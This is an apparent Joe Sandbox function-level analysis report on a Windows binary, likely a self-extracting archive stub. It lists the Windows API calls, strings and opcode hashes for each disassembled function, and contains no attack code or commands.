                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID: _invalid_parameter_noinfo_noreturn$ByteCharConcurrency::cancel_current_taskMultiWide_snwprintf
                                                                                    • String ID: $ ,$$%s:$*messages***$*messages***$@%s:$DIALOG$DIRECTION$MENU$RTL$STRINGS
                                                                                    • API String ID: 3629253777-3268106645
                                                                                    • Opcode ID: 8aaf1c45cbcc11cbfd530713bfdb0f17bae577493be60ab4fa7bf8ddb10da4b4
                                                                                    • Instruction ID: 954c5876aeece3fddf9c00a5134394b69a96af4d46c6fce83034e773e08dd3e7
                                                                                    • Opcode Fuzzy Hash: 8aaf1c45cbcc11cbfd530713bfdb0f17bae577493be60ab4fa7bf8ddb10da4b4
                                                                                    • Instruction Fuzzy Hash: 5D62AD32B296468DEB10AF28C4442B9E365FB62785FC08131DB6D476D9EF3CE546C364

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$Show$CloseCodeExecuteExitHandleIdleInputProcessShellVisibleWait_invalid_parameter_noinfo_noreturn
                                                                                    • String ID: .exe$.inf$Install$p
                                                                                    • API String ID: 148627002-3607691742
                                                                                    • Opcode ID: 2d7998a32035a4fc601e65b4436ed2b79fab0909f737541ab6a1b27ecdec70d9
                                                                                    • Instruction ID: d41a396bbdd468f78bdba1cc2659a979555363497e2e1d37087fc872664abef8
                                                                                    • Opcode Fuzzy Hash: 2d7998a32035a4fc601e65b4436ed2b79fab0909f737541ab6a1b27ecdec70d9
                                                                                    • Instruction Fuzzy Hash: F1C19272F0864299FB50FB29D44027DE3A1EFA6B81F844131DB4D53699DF3CE9928328

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
                                                                                    • String ID:
                                                                                    • API String ID: 3569833718-0
                                                                                    • Opcode ID: 0fb222555432dd670f17b16db3dadffebd863f7b02b7ecab73019b4fc4b50d88
                                                                                    • Instruction ID: 50fe464b658042b0e853ca8a20a2e39625a983c3d6f9e2226d66ae2b8d31905d
                                                                                    • Opcode Fuzzy Hash: 0fb222555432dd670f17b16db3dadffebd863f7b02b7ecab73019b4fc4b50d88
                                                                                    • Instruction Fuzzy Hash: 0C41F931B146428EF700AF69D8007A9A761FB5AB89FC41531DE0E07B8DCF3DE50A8B14

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID: ExceptionRaise$ErrorLastLibraryLoad
                                                                                    • String ID: H
                                                                                    • API String ID: 948315288-2852464175
                                                                                    • Opcode ID: f4eb3733d8d59e353b2384fb2f2ad1e612cbd000d7ed42ebdaafdbb0fd1220b0
                                                                                    • Instruction ID: 30cef2be538c09163b3b42809627d9fd4870deb4c15a3ef6e4ac6fe372104c5e
                                                                                    • Opcode Fuzzy Hash: f4eb3733d8d59e353b2384fb2f2ad1e612cbd000d7ed42ebdaafdbb0fd1220b0
                                                                                    • Instruction Fuzzy Hash: C1915C32A14B518EEB40DF69D8406ACB3A1FB2A759F844535EF0D17758EF38E496C328

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID: EnvironmentVariable$_invalid_parameter_noinfo_noreturn
                                                                                    • String ID: sfxcmd$sfxpar
                                                                                    • API String ID: 3540648995-3493335439
                                                                                    • Opcode ID: b11b83db7919d23c0ea9a675594a34a2207fd524d4d6241bfc028c77fcb1733c
                                                                                    • Instruction ID: fd555503f166ba452e53f497aa4bbd20103ff4d28a0772ad6b1a23f379beb948
                                                                                    • Opcode Fuzzy Hash: b11b83db7919d23c0ea9a675594a34a2207fd524d4d6241bfc028c77fcb1733c
                                                                                    • Instruction Fuzzy Hash: 9231B272E14A1288EB00EF6DD4401BDE371EB66B89F941232DF5D126ADDE38D482C358

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID: Global$Resource$Object$AllocBitmapCreateDeleteGdipLoadLock$FindFreeFromSizeofStreamUnlock
                                                                                    • String ID: ]
                                                                                    • API String ID: 3561356813-3352871620
                                                                                    • Opcode ID: 1c66b544a6b9d08b2250c3e1d750f5c667527eb235c99ff42d281833c251e765
                                                                                    • Instruction ID: 709c1c1adc114d855c3e947eead3864e84e4c97de11388097672dac5265fa8e2
                                                                                    • Opcode Fuzzy Hash: 1c66b544a6b9d08b2250c3e1d750f5c667527eb235c99ff42d281833c251e765
                                                                                    • Instruction Fuzzy Hash: 89119A31B0960289FA14BB19A5141B9E391AFAABD5F940134DF1D07B8DEE3CE9078754

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID: File$Create$CloseHandleTime_invalid_parameter_noinfo_noreturn
                                                                                    • String ID:
                                                                                    • API String ID: 2398171386-0
                                                                                    • Opcode ID: 0a52db6dad1828742b9444eab5e4d03181f60c141bb1b27e52af4acc5450fb8b
                                                                                    • Instruction ID: 67d25d1069cce97e3f3978775ca6d23b035cddbf4ef8bb8283553f8d16a4c963
                                                                                    • Opcode Fuzzy Hash: 0a52db6dad1828742b9444eab5e4d03181f60c141bb1b27e52af4acc5450fb8b
                                                                                    • Instruction Fuzzy Hash: 2461E872F146424DFB11AFA9D4003BDE361AB6A7AAF800631DF2D5679CDE3890468358

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID: Message$DispatchObjectPeekSingleTranslateWait
                                                                                    • String ID:
                                                                                    • API String ID: 3621893840-0

                                                                                    APIs
                                                                                    Similarity
                                                                                    • API ID: Message$DialogDispatchPeekTranslate
                                                                                    • String ID:
                                                                                    • API String ID: 1266772231-0
                                                                                    APIs
                                                                                    • GetStdHandle.KERNEL32(?,?,?,?,?,?,?,00000000,00000000,?,2AAAAAAAAAAAAAAB,00007FF7B8F07EEA,?,?,00000000,00007FF7B8F13189), ref: 00007FF7B8F020CF
                                                                                    • WriteFile.KERNEL32(?,?,?,?,?,?,?,00000000,00000000,?,2AAAAAAAAAAAAAAB,00007FF7B8F07EEA,?,?,00000000,00007FF7B8F13189), ref: 00007FF7B8F0211B
                                                                                    • WriteFile.KERNELBASE(?,?,?,?,?,?,?,00000000,00000000,?,2AAAAAAAAAAAAAAB,00007FF7B8F07EEA,?,?,00000000,00007FF7B8F13189), ref: 00007FF7B8F0214A
                                                                                    Similarity
                                                                                    • API ID: FileWrite$Handle
                                                                                    • String ID:
                                                                                    • API String ID: 4209713984-0
                                                                                    APIs
                                                                                    Similarity
                                                                                    • API ID: _invalid_parameter_noinfo_noreturn$TextWindow
                                                                                    • String ID:
                                                                                    • API String ID: 2912839123-0
                                                                                    APIs
                                                                                    Similarity
                                                                                    • API ID: CreateDirectory$ErrorLast_invalid_parameter_noinfo_noreturn
                                                                                    • String ID:
                                                                                    • API String ID: 2359106489-0
                                                                                    APIs
                                                                                    Similarity
                                                                                    • API ID: ErrorLast$FileHandleRead
                                                                                    • String ID:
                                                                                    • API String ID: 2244327787-0
                                                                                    APIs
                                                                                      • Part of subcall function 00007FF7B8F0E638: ResetEvent.KERNEL32 ref: 00007FF7B8F0E651
                                                                                      • Part of subcall function 00007FF7B8F0E638: ReleaseSemaphore.KERNEL32 ref: 00007FF7B8F0E667
                                                                                    • ReleaseSemaphore.KERNEL32 ref: 00007FF7B8F0E2DC
                                                                                    • CloseHandle.KERNELBASE ref: 00007FF7B8F0E2FB
                                                                                    • DeleteCriticalSection.KERNEL32 ref: 00007FF7B8F0E312
                                                                                    • CloseHandle.KERNEL32 ref: 00007FF7B8F0E31F
                                                                                      • Part of subcall function 00007FF7B8F0E3C4: WaitForSingleObject.KERNEL32(?,?,?,?,?,?,?,?,00007FF7B8F0E2C7,?,?,?,00007FF7B8F0398E,?,?,?), ref: 00007FF7B8F0E3CB
                                                                                      • Part of subcall function 00007FF7B8F0E3C4: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00007FF7B8F0E2C7,?,?,?,00007FF7B8F0398E,?,?,?), ref: 00007FF7B8F0E3D6
                                                                                    Similarity
                                                                                    • API ID: CloseHandleReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                                                                                    • String ID:
                                                                                    • API String ID: 502429940-0
                                                                                    APIs
                                                                                    Similarity
                                                                                    • API ID: CapsDevice$Release
                                                                                    • String ID:
                                                                                    • API String ID: 1035833867-0
                                                                                    APIs
                                                                                    Strings
                                                                                    Similarity
                                                                                    • API ID: Thread$CreatePriority
                                                                                    • String ID: CreateThread failed
                                                                                    • API String ID: 2610526550-3849766595
                                                                                    APIs
                                                                                    Strings
                                                                                    Similarity
                                                                                    • API ID: DirectoryInitializeMallocSystem
                                                                                    • String ID: riched20.dll
                                                                                    • API String ID: 174490985-3360196438
                                                                                    APIs
                                                                                    Strings
                                                                                    Similarity
                                                                                    • API ID: AutoCompleteFindWindow
                                                                                    • String ID: Edit
                                                                                    • API String ID: 4260060072-554135844
                                                                                    APIs
                                                                                      • Part of subcall function 00007FF7B8F17DC0: GlobalMemoryStatusEx.KERNEL32 ref: 00007FF7B8F17DF0
                                                                                      • Part of subcall function 00007FF7B8F0A008: _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7B8F0A1DC
                                                                                      • Part of subcall function 00007FF7B8EF1FA8: _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7B8EF2003
                                                                                      • Part of subcall function 00007FF7B8EF12C0: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7B8EF13B5
                                                                                    • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7B8F1F9E8
                                                                                    • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7B8F1F9EE
                                                                                    • SendDlgItemMessageW.USER32 ref: 00007FF7B8F1FA1E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_taskGlobalItemMemoryMessageSendStatus
                                                                                    • String ID:
                                                                                    • API String ID: 3842196933-0
                                                                                    • Opcode ID: 650464f74f6adde03c3e096a7ab7484960493bf9e270f66c25aec513068083cb
                                                                                    • Instruction ID: 5dd8a53a3c7b7d0aa7960955ad8b3a533783d1991bd02b0474b011e101f0cffb
                                                                                    • Opcode Fuzzy Hash: 650464f74f6adde03c3e096a7ab7484960493bf9e270f66c25aec513068083cb
                                                                                    • Instruction Fuzzy Hash: E051CF62F1464559FB00FBB9C4412FCE3629BA6785FC00236EB1D5779EEE2CE5428368
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID: _invalid_parameter_noinfo_noreturn$FileOperation
                                                                                    • String ID:
                                                                                    • API String ID: 2032784890-0
                                                                                    • Opcode ID: 98723d9f55368b2c94374f1f9097e19eeaaf1c2526e53fefa64e32e6fbf1f7f2
                                                                                    • Instruction ID: d122282bda0b2297cd9106b4d3171c0af9e239902ac6e223ad15f5f63082d5cf
                                                                                    • Opcode Fuzzy Hash: 98723d9f55368b2c94374f1f9097e19eeaaf1c2526e53fefa64e32e6fbf1f7f2
                                                                                    • Instruction Fuzzy Hash: 4F617F72B14A41DDEB00EF68C4502ECA3A1EB66799FD04632DB1C13A9DDF38D586C358
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID: Concurrency::cancel_current_task__std_exception_copy_invalid_parameter_noinfo_noreturn
                                                                                    • String ID:
                                                                                    • API String ID: 2371198981-0
                                                                                    • Opcode ID: 8b315dc57e732e4b817d1df424eb13c89c6dcbcb93aab7ca25f36618ee65f805
                                                                                    • Instruction ID: 6eccb7cd04db45137d7cc23576cae6f0ab7203b14f4783bbc0f81af0cd6ebf73
                                                                                    • Opcode Fuzzy Hash: 8b315dc57e732e4b817d1df424eb13c89c6dcbcb93aab7ca25f36618ee65f805
                                                                                    • Instruction Fuzzy Hash: 2B411961B0468A85FA15AF6AE540169E351EB65BE4FC44631EF6C077D9DE3CE082C318
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateFile$_invalid_parameter_noinfo_noreturn
                                                                                    • String ID:
                                                                                    • API String ID: 2272807158-0
                                                                                    • Opcode ID: 060cc0a38694d791e80acce914d530998a70a7722192c3303a1da7563db9334e
                                                                                    • Instruction ID: 8e994da052be8b6da22e655a6df54887ea78c40c5e58525a3474e2c138a525ca
                                                                                    • Opcode Fuzzy Hash: 060cc0a38694d791e80acce914d530998a70a7722192c3303a1da7563db9334e
                                                                                    • Instruction Fuzzy Hash: 4841F872A0878189E7209F18E44426DE3A0FB967B5F900330DFBD06AD9DF3CD4828718
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
                                                                                    • String ID:
                                                                                    • API String ID: 3251591375-0
                                                                                    • Opcode ID: 37a456eb0663cc8f0b58a3dc1134bc714702bc727f811831befa984599e29d28
                                                                                    • Instruction ID: 21e0c8293979acff8600cef6ca27018aa210d87a1ad0089805a91aa9f7fa425b
                                                                                    • Opcode Fuzzy Hash: 37a456eb0663cc8f0b58a3dc1134bc714702bc727f811831befa984599e29d28
                                                                                    • Instruction Fuzzy Hash: D931E831A0D1474AFA54BF6C94213B9E291AF63746FC44434FB4E4B2DEDE3CA9078269
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID: std::bad_alloc::bad_alloc
                                                                                    • String ID:
                                                                                    • API String ID: 1875163511-0
                                                                                    • Opcode ID: 347a1d0be82b04a822f8caac984823906b6ad4c79e8f8761dfd478e459a67773
                                                                                    • Instruction ID: b2b2e0ba1fc2ab0e15947d6aac7cc53161fa5e4554218934741817b04ac55b14
                                                                                    • Opcode Fuzzy Hash: 347a1d0be82b04a822f8caac984823906b6ad4c79e8f8761dfd478e459a67773
                                                                                    • Instruction Fuzzy Hash: 4D41B632A1864698FB50FB18D4093B8E3A0FB61B55FA85032EB5C0669DDF7DD887C324
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID: TextWindow$Length_invalid_parameter_noinfo_noreturn
                                                                                    • String ID:
                                                                                    • API String ID: 2176759853-0
                                                                                    • Opcode ID: fed33a3ebc80013bb6e3ccf0a7268bec7f7373925f2f792f51519c1922125491
                                                                                    • Instruction ID: b95ccfdf78b14e9db5a9382c33d2aa69690b6d1d193c5299e1733f35a844a6ad
                                                                                    • Opcode Fuzzy Hash: fed33a3ebc80013bb6e3ccf0a7268bec7f7373925f2f792f51519c1922125491
                                                                                    • Instruction Fuzzy Hash: 6631C872A18B8681EA149B69E44016AE361FFDABD0F945331FB9C03B59DF3CE1818704
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID: AttributesFile$_invalid_parameter_noinfo_noreturn
                                                                                    • String ID:
                                                                                    • API String ID: 1203560049-0
                                                                                    • Opcode ID: 08db2852ca505c60db5e713f284bd15ca363d920cadf6659b93265f0b72ade95
                                                                                    • Instruction ID: c5f982c2ddb8692323a8b306cec8c2da5441cd62d52735f32f4d0c4c1e1fefc5
                                                                                    • Opcode Fuzzy Hash: 08db2852ca505c60db5e713f284bd15ca363d920cadf6659b93265f0b72ade95
                                                                                    • Instruction Fuzzy Hash: 9621FC72F1868249EA20AF28E04116DE350FF9A796F904231EFAD42699DF3CD582860C
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
